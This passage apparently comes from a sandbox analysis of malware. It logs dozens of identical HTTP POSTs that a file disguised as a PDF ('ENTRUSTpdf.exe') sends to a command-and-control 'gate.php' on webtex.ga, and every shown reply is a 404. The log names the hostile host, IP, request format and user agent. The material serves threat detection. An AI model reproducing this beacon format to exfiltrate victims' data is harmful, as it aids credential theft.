                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:48.194021940 CET228INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:05 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    52192.168.2.34977147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:48.431386948 CET229OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:48.492337942 CET229INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:05 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    53192.168.2.34977247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:48.713865042 CET230OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:48.774087906 CET231INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    54192.168.2.34977347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:49.003809929 CET232OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:49.067827940 CET232INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    55192.168.2.34977447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:49.292978048 CET233OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:49.354669094 CET233INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    56192.168.2.34977547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:49.591345072 CET234OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:49.830852985 CET235INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:06 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    57192.168.2.34977647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:50.060343981 CET236OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:50.125688076 CET236INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:07 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    58192.168.2.34977747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:50.360534906 CET237OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:50.424429893 CET238INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:07 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    59192.168.2.34977847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:50.664604902 CET238OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:50.723849058 CET239INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:07 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    6192.168.2.34971547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:31.524698019 CET72OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:31.584800959 CET73INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:48 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    60192.168.2.34977947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:50.972121954 CET240OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:51.037888050 CET240INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:08 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    61192.168.2.34978047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:51.261332035 CET241OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:51.322457075 CET242INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:08 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    62192.168.2.34978147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:51.534735918 CET242OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:51.601372957 CET243INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:08 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    63192.168.2.34978247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:51.849829912 CET244OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:51.905245066 CET244INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    64192.168.2.34978347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:52.137412071 CET245OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:52.196885109 CET246INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    65192.168.2.34978447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:52.444505930 CET247OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:52.504973888 CET247INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:09 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    66192.168.2.34978547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:52.774910927 CET248OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:52.833587885 CET249INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:10 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    67192.168.2.34978647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:53.118413925 CET249OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:53.234137058 CET251INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:10 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    68192.168.2.34978847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:53.460521936 CET253OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:53.519107103 CET253INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:10 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    69192.168.2.34978947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:53.749877930 CET261OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:53.808731079 CET266INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    7192.168.2.34971647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:31.827446938 CET74OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:31.881911039 CET74INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    70192.168.2.34979047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:54.121372938 CET266OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:54.179342031 CET267INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    71192.168.2.34979147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:54.407059908 CET268OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:54.467418909 CET268INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:11 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    72192.168.2.34979247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:55.055545092 CET269OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:55.114170074 CET270INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:12 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    73192.168.2.34979347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:55.316097975 CET271OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:55.375067949 CET271INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:12 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    74192.168.2.34979447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:56.857682943 CET272OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:56.919630051 CET273INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:14 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    75192.168.2.34979547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    76192.168.2.34979647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    77192.168.2.34979747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    78192.168.2.34979847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    79192.168.2.34979947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    8192.168.2.34971747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:32.151700974 CET75OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:32.212960958 CET76INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    80192.168.2.34980047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    81192.168.2.34980147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    82192.168.2.34980247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    83192.168.2.34980547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    84192.168.2.34980647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    85192.168.2.34980747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    86192.168.2.34980847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    87192.168.2.34980947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
